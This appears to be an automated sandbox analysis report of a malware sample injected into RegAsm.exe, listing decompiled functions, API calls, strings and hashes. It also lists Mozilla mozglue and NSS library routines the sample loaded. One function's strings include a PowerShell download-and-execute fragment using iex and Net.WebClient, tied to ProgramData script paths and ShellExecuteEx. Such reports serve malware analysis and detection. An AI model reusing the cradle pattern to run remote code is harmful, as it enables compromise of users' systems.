                                                                                      • Part of subcall function 6CC6CBE8: GetCurrentProcess.KERNEL32(?,6CC331A7), ref: 6CC6CBF1
                                                                                      • Part of subcall function 6CC6CBE8: TerminateProcess.KERNEL32(00000000,00000003,?,6CC331A7), ref: 6CC6CBFA
                                                                                    • ?RegisterProfilerLabelEnterExit@mozilla@@YAXP6APAXPBD0PAX@ZP6AX1@Z@Z.MOZGLUE(00000000,00000000,?,?,?,6CC44A68), ref: 6CC7DEB8
                                                                                    • free.MOZGLUE(00000000,?,6CC44A68), ref: 6CC7DEFE
                                                                                    • ?ReleaseBufferForMainThreadAddMarker@base_profiler_markers_detail@mozilla@@YAXXZ.MOZGLUE ref: 6CC7DF38
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_set_process_name("%s", "%s"), xrefs: 6CC7E00E
                                                                                    • [I %d/%d] locked_profiler_stop, xrefs: 6CC7DE83
                                                                                    • <none>, xrefs: 6CC7DFD7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: CurrentThread$getenv$ExclusiveLockProcessRelease_getpid$AcquireBufferEnterExit@mozilla@@Init_thread_footerLabelMainMarker@base_profiler_markers_detail@mozilla@@ProfilerRegisterTerminate__acrt_iob_func__stdio_common_vfprintffree
                                                                                    • String ID: <none>$[I %d/%d] locked_profiler_stop$[I %d/%d] profiler_set_process_name("%s", "%s")
                                                                                    • API String ID: 1281939033-809102171
                                                                                    • Opcode ID: a4a944557c9bb55f58dc34e4d826ad57f3f53a1b717694da40663c698f470f64
                                                                                    • Instruction ID: bbb3ebcb5fecd236de531b9bf4561cf1e43243eb28dd6efe89c0c29d5eca5e3e
                                                                                    • Opcode Fuzzy Hash: a4a944557c9bb55f58dc34e4d826ad57f3f53a1b717694da40663c698f470f64
                                                                                    • Instruction Fuzzy Hash: DA41D13DB012119FDB209FA9D8587AAB775EB8630CF144019E90997F01EB71AC05CBFA
                                                                                    Function 0041282B Relevance: 21.3, APIs: 2, Strings: 10, Instructions: 310COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00412830
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 0040FA9C: _EH_prolog.MSVCRT ref: 0040FAA1
                                                                                      • Part of subcall function 0040FA9C: lstrlenA.KERNEL32(?,?,?,?,?,00417294,?,?,00426AC0,?,00000000,0042656F), ref: 0040FAC9
                                                                                      • Part of subcall function 0040FA9C: lstrcpy.KERNEL32(00000000), ref: 0040FAF0
                                                                                      • Part of subcall function 0040FA9C: lstrcat.KERNEL32(?,?), ref: 0040FAFB
                                                                                      • Part of subcall function 0040F9E1: lstrcpy.KERNEL32(00000000,?), ref: 0040FA1A
                                                                                      • Part of subcall function 00410B5C: _EH_prolog.MSVCRT ref: 00410B61
                                                                                      • Part of subcall function 00410B5C: GetSystemTime.KERNEL32(?,00426440,00000001,000000C8,00000000,00426562), ref: 00410BA1
                                                                                      • Part of subcall function 0040FA28: _EH_prolog.MSVCRT ref: 0040FA2D
                                                                                      • Part of subcall function 0040FA28: lstrcpy.KERNEL32(00000000), ref: 0040FA79
                                                                                      • Part of subcall function 0040FA28: lstrcat.KERNEL32(?,?), ref: 0040FA83
                                                                                    • ShellExecuteEx.SHELL32(0000003C), ref: 00412BFF
                                                                                      • Part of subcall function 00401061: _EH_prolog.MSVCRT ref: 00401066
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: H_prolog$lstrcpy$lstrcat$ExecuteShellSystemTimelstrlen
                                                                                    • String ID: "" $')"$*.ps1$-nop -c "iex(New-Object Net.WebClient).DownloadString('$.ps1$<$C:\ProgramData\$C:\ProgramData\$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe$pr
                                                                                    • API String ID: 585178538-2111799918
                                                                                    • Opcode ID: 83bf2b9d1f8e7e623ac302f993933e5172bcb7f12d83e075394a32d42ebc3a23
                                                                                    • Instruction ID: 0598e67e875d9371bde97124fd189c4351134adf3249a6be01d8dc1ef949b6e7
                                                                                    • Opcode Fuzzy Hash: 83bf2b9d1f8e7e623ac302f993933e5172bcb7f12d83e075394a32d42ebc3a23
                                                                                    • Instruction Fuzzy Hash: 87D15CB090424DEACB15EBE1D952BDEBBB8AF18308F5041BEE505735C2DA781B4CCB65
                                                                                    Function 6CD64CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • PK11_SignatureLen.NSS3(?), ref: 6CD64D80
                                                                                    • PORT_Alloc_Util.NSS3(00000000), ref: 6CD64D95
                                                                                    • PORT_NewArena_Util.NSS3(00000800), ref: 6CD64DF2
                                                                                    • PR_SetError.NSS3(FFFFE005,00000000), ref: 6CD64E2C
                                                                                    • PR_SetError.NSS3(FFFFE028,00000000), ref: 6CD64E43
                                                                                    • PORT_NewArena_Util.NSS3(00000800), ref: 6CD64E58
                                                                                    • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6CD64E85
                                                                                    • DER_Encode_Util.NSS3(?,?,6CEB05A4,00000000), ref: 6CD64EA7
                                                                                    • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6CD64F17
                                                                                    • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6CD64F45
                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD64F62
                                                                                    • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6CD64F7A
                                                                                    • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6CD64F89
                                                                                    • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6CD64FC8
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                    • String ID:
                                                                                    • API String ID: 2843999940-0
                                                                                    • Opcode ID: e9298a3058a9524eaad8e53cebe922545b4bc0d739935b47c998bc2301768913
                                                                                    • Instruction ID: f7a3b2a4629132bcdbc826335f454b940a33fb07627e8d5d5709fae85d8ac2e9
                                                                                    • Opcode Fuzzy Hash: e9298a3058a9524eaad8e53cebe922545b4bc0d739935b47c998bc2301768913
                                                                                    • Instruction Fuzzy Hash: ED81C3B1908301EFE701CF26D850B5BB7E4AB84358F14892DF998DBA61E731E905CB92
                                                                                    Function 6CC8D840 Relevance: 21.2, APIs: 14, Instructions: 206threadtimeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D85F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D86C
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D918
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D93C
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D948
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D970
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D976
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D982
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D9CF
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC8DA2E
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8DA6F
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8DA78
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE ref: 6CC8DA91
                                                                                      • Part of subcall function 6CC55C50: GetTickCount64.KERNEL32 ref: 6CC55D40
                                                                                      • Part of subcall function 6CC55C50: EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC55D67
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8DAB7
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Count64CriticalEnterSectionStampTickTimeV01@@Value@mozilla@@Xbad_function_call@std@@
                                                                                    • String ID:
                                                                                    • API String ID: 1195625958-0
                                                                                    • Opcode ID: 85d5bae015983f66aef01da2e1c4f1a4f2ff76356281145a34a7d5830562678a
                                                                                    • Instruction ID: e46abd5caba052722e54fcc871b490c89618e6130c17c4d8554c6d930661f241
                                                                                    • Opcode Fuzzy Hash: 85d5bae015983f66aef01da2e1c4f1a4f2ff76356281145a34a7d5830562678a
                                                                                    • Instruction Fuzzy Hash: 5371CC716043059FCB00CF69C898B9ABBF5FF89318F15856EF85A9B311EB30A945CB91
                                                                                    Function 6CC8D4D0 Relevance: 21.2, APIs: 14, Instructions: 165threadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D4F0
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D4FC
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D52A
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D530
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D53F
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D55F
                                                                                    • free.MOZGLUE(00000000), ref: 6CC8D585
                                                                                    • ?_Xbad_function_call@std@@YAXXZ.MSVCP140 ref: 6CC8D5D3
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D5F9
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D605
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D652
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC8D658
                                                                                    • AcquireSRWLockExclusive.KERNEL32(?), ref: 6CC8D667
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(?), ref: 6CC8D6A2
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLock$AcquireCurrentReleaseThread$Xbad_function_call@std@@free
                                                                                    • String ID:
                                                                                    • API String ID: 2206442479-0
                                                                                    • Opcode ID: 9c4a39e64d61966d01172d39e24b93c32d3f1e9b99b0c386e7cbdc494dfd4444
                                                                                    • Instruction ID: 6b8429217441f5d062c37c545a1846f654b366f4165faeed9df6732add8e392b
                                                                                    • Opcode Fuzzy Hash: 9c4a39e64d61966d01172d39e24b93c32d3f1e9b99b0c386e7cbdc494dfd4444
                                                                                    • Instruction Fuzzy Hash: D3516AB16057059FC704DF75C898A9ABBB4FF89318F108A2EE84A87711EB30A945CB95
                                                                                    Function 00412DD7 Relevance: 19.7, APIs: 13, Instructions: 186stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • _EH_prolog.MSVCRT ref: 00412DDC
                                                                                    • memset.MSVCRT ref: 00412DFD
                                                                                    • memset.MSVCRT ref: 00412E0B
                                                                                      • Part of subcall function 00410D21: SHGetFolderPathA.SHELL32(00000000,;\B,00000000,00000000,?), ref: 00410D52
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00412E37
                                                                                    • lstrcat.KERNEL32(?), ref: 00412E55
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00412E69
                                                                                    • lstrcat.KERNEL32(?), ref: 00412E7C
                                                                                      • Part of subcall function 0040F923: lstrcpy.KERNEL32(00000000,00000000), ref: 0040F94D
                                                                                      • Part of subcall function 00410CDD: _EH_prolog.MSVCRT ref: 00410CE2
                                                                                      • Part of subcall function 00410CDD: GetFileAttributesA.KERNEL32(00000000,?,0040BAC2,?,00425BF6,?,?), ref: 00410CF6
                                                                                      • Part of subcall function 004010B1: _EH_prolog.MSVCRT ref: 004010B6
                                                                                      • Part of subcall function 0040C186: _EH_prolog.MSVCRT ref: 0040C18B
                                                                                      • Part of subcall function 0040C186: StrStrA.SHLWAPI(00000000,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0040C1DE
                                                                                      • Part of subcall function 0040C186: memcmp.MSVCRT ref: 0040C21C
                                                                                      • Part of subcall function 0040618B: _EH_prolog.MSVCRT ref: 00406190
                                                                                      • Part of subcall function 0040618B: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061B3
                                                                                      • Part of subcall function 0040618B: GetFileSizeEx.KERNEL32(00000000,?,?,?,?,?,?,?,?,00000000), ref: 004061CA
                                                                                      • Part of subcall function 0040618B: LocalAlloc.KERNEL32(00000040,?,00000000,00000000,?,?,?,?,?,?,?,00000000), ref: 004061E6
                                                                                      • Part of subcall function 0040618B: ReadFile.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,00000000), ref: 00406200
                                                                                      • Part of subcall function 0040618B: CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 00406221
                                                                                      • Part of subcall function 00410F98: GlobalAlloc.KERNEL32(00000000,/A,00000000,00000000,?,00412F0A,?,?), ref: 00410FA3
                                                                                    • StrStrA.SHLWAPI(00000000), ref: 00412F16
                                                                                    • GlobalFree.KERNEL32(?), ref: 00412FE5
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406262
                                                                                      • Part of subcall function 00406242: LocalAlloc.KERNEL32(00000040,004058F9,?,?,004058F9,00000000,?,?), ref: 00406270
                                                                                      • Part of subcall function 00406242: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,004058F9,00000000,00000000), ref: 00406286
                                                                                      • Part of subcall function 00406242: LocalFree.KERNEL32(00000000,?,?,004058F9,00000000,?,?), ref: 00406295
                                                                                      • Part of subcall function 004063B1: _EH_prolog.MSVCRT ref: 004063B6
                                                                                      • Part of subcall function 004063B1: memcmp.MSVCRT ref: 004063DC
                                                                                      • Part of subcall function 004063B1: memset.MSVCRT ref: 0040640B
                                                                                      • Part of subcall function 004063B1: LocalAlloc.KERNEL32(00000040,-000000E1,?,?,?,?,00000000,00000000), ref: 00406440
                                                                                    • lstrcat.KERNEL32(?,00000000), ref: 00412F8B
                                                                                    • StrCmpCA.SHLWAPI(?,0042651E,?,?,?,?,000003E8), ref: 00412FA8
                                                                                    • lstrcat.KERNEL32(?,?), ref: 00412FC1
                                                                                    • lstrcat.KERNEL32(?,00426888), ref: 00412FCF
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2525936696.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000052E000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000534000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000553000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.0000000000572000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000060B000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2525936696.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                    Yara matches
                                                                                    Similarity
                                                                                    • API ID: lstrcat$H_prolog$AllocFileLocal$memset$BinaryCryptFreeGlobalStringmemcmp$AttributesCloseCreateFolderHandlePathReadSizelstrcpy
                                                                                    • String ID:
                                                                                    • API String ID: 174962345-0
                                                                                    • Opcode ID: c12af0d08b80cfdc46510c18b6634d6eac17fead41f825f8c7138a6c640ef2d0
                                                                                    • Instruction ID: 3957c4cacb1527ca794d6fb4f8c228a0b5d7af048e536104d3bcd38493db67d6
                                                                                    • Opcode Fuzzy Hash: c12af0d08b80cfdc46510c18b6634d6eac17fead41f825f8c7138a6c640ef2d0
                                                                                    • Instruction Fuzzy Hash: 47613EB2D0021DABDF11EBE1DC45DDEBBBDAF18304F00046AF605E3151EA799A988B65
                                                                                    Function 6CD4ACC0 Relevance: 19.6, APIs: 13, Instructions: 150stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537699692.000000006CCD1000.00000020.00000001.01000000.00000007.sdmp, Offset: 6CCD0000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537650615.000000006CCD0000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538324121.000000006CE6F000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538473689.000000006CEAE000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538508502.000000006CEAF000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538542365.000000006CEB0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2538578827.000000006CEB5000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6ccd0000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: free$Unlock$ErrorValuecallocmallocmemcpystrcpystrlen
                                                                                    • String ID:
                                                                                    • API String ID: 786543732-0
                                                                                    • Opcode ID: 25b2e18986cbb662b788d5a22a7fc5daee098e0a7d6b530ed47c2404cb381022
                                                                                    • Instruction ID: 68232e41323b32a9e85d4ee237c221dfa1c48102218282a09ffbce049c9c4c2a
                                                                                    • Opcode Fuzzy Hash: 25b2e18986cbb662b788d5a22a7fc5daee098e0a7d6b530ed47c2404cb381022
                                                                                    • Instruction Fuzzy Hash: 6551ADB1F01216DFDB00DF98DD41AAE77B4BB06358F148035DA19A7A20E331E915CBE6
                                                                                    Function 6CC55670 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 272timeCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_APP_RESTART), ref: 6CC556D1
                                                                                    • ?Now@TimeStamp@mozilla@@CA?AV12@_N@Z.MOZGLUE(?,00000001), ref: 6CC556E9
                                                                                    • ?ComputeProcessUptime@TimeStamp@mozilla@@CA_KXZ.MOZGLUE ref: 6CC556F1
                                                                                    • ?TicksFromMilliseconds@BaseTimeDurationPlatformUtils@mozilla@@SA_JN@Z.MOZGLUE ref: 6CC55744
                                                                                    • ??0TimeStampValue@mozilla@@AAE@_K0_N@Z.MOZGLUE(?,?,?,?,?), ref: 6CC557BC
                                                                                    • GetTickCount64.KERNEL32 ref: 6CC558CB
                                                                                    • EnterCriticalSection.KERNEL32(6CCBF688), ref: 6CC558F3
                                                                                    • __aulldiv.LIBCMT ref: 6CC55945
                                                                                    • LeaveCriticalSection.KERNEL32(6CCBF688), ref: 6CC559B2
                                                                                    • ??GTimeStampValue@mozilla@@QBE_KABV01@@Z.MOZGLUE(6CCBF638,?,?,?,?), ref: 6CC559E9
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: Time$CriticalSectionStampStamp@mozilla@@Value@mozilla@@$BaseComputeCount64DurationEnterFromLeaveMilliseconds@Now@PlatformProcessTickTicksUptime@Utils@mozilla@@V01@@V12@___aulldivgetenv
                                                                                    • String ID: MOZ_APP_RESTART
                                                                                    • API String ID: 2752551254-2657566371
                                                                                    • Opcode ID: e840d3b08470c7dc352ec84a4d26bcb77a8a9f5bec8b314b05cb6f434263e41d
                                                                                    • Instruction ID: 12408110a06ff88b6264ba13c981f0291965a2d368dcbb3d891aac047f195198
                                                                                    • Opcode Fuzzy Hash: e840d3b08470c7dc352ec84a4d26bcb77a8a9f5bec8b314b05cb6f434263e41d
                                                                                    • Instruction Fuzzy Hash: 6DC19B79A083419FCB05CF68C44066ABBF1BFDA714F458A1DE8C497760E730E895CB86
                                                                                    Function 6CC7EC70 Relevance: 19.3, APIs: 10, Strings: 1, Instructions: 81threadsynchronizationCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_VERBOSE_LOGGING,6CC44A68), ref: 6CC7945E
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_DEBUG_LOGGING), ref: 6CC79470
                                                                                      • Part of subcall function 6CC79420: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(MOZ_BASE_PROFILER_LOGGING), ref: 6CC79482
                                                                                      • Part of subcall function 6CC79420: __Init_thread_footer.LIBCMT ref: 6CC7949F
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7EC84
                                                                                    • _getpid.API-MS-WIN-CRT-RUNTIME-L1-1-0 ref: 6CC7EC8C
                                                                                      • Part of subcall function 6CC794D0: __acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000002,00000000,00000000), ref: 6CC794EE
                                                                                      • Part of subcall function 6CC794D0: __stdio_common_vfprintf.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,?,00000000,00000000,00000000,?), ref: 6CC79508
                                                                                    • GetCurrentThreadId.KERNEL32 ref: 6CC7ECA1
                                                                                    • AcquireSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ECAE
                                                                                    • ?profiler_init@baseprofiler@mozilla@@YAXPAX@Z.MOZGLUE(00000000), ref: 6CC7ECC5
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ED0A
                                                                                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 6CC7ED19
                                                                                    • CloseHandle.KERNEL32(?), ref: 6CC7ED28
                                                                                    • free.MOZGLUE(00000000), ref: 6CC7ED2F
                                                                                    • ReleaseSRWLockExclusive.KERNEL32(6CCBF4B8), ref: 6CC7ED59
                                                                                    Strings
                                                                                    • [I %d/%d] profiler_ensure_started, xrefs: 6CC7EC94
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000001.00000002.2537294815.000000006CC31000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CC30000, based on PE: true
                                                                                    • Associated: 00000001.00000002.2537272701.000000006CC30000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537520314.000000006CCAD000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537569408.000000006CCBE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                                                    • Associated: 00000001.00000002.2537623139.000000006CCC2000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_1_2_6cc30000_RegAsm.jbxd
                                                                                    Similarity
                                                                                    • API ID: ExclusiveLockgetenv$CurrentReleaseThread$?profiler_init@baseprofiler@mozilla@@AcquireCloseHandleInit_thread_footerObjectSingleWait__acrt_iob_func__stdio_common_vfprintf_getpidfree
                                                                                    • String ID: [I %d/%d] profiler_ensure_started
                                                                                    • API String ID: 4057186437-125001283
                                                                                    • Opcode ID: 0b5f746ca30ce80bc79f34900e728158a2a719addba06bcce23a0810fa68d7c2
                                                                                    • Instruction ID: 07281a793eb7ed1c1053609bf6e718834aecc0d9380b5e9f9dcdcdc33db649e5
                                                                                    • Opcode Fuzzy Hash: 0b5f746ca30ce80bc79f34900e728158a2a719addba06bcce23a0810fa68d7c2
                                                                                    • Instruction Fuzzy Hash: 3C21F17E600118AFDB109FA8D848ADAB779FF4626CF104214FC1897B41FB719C158BB9
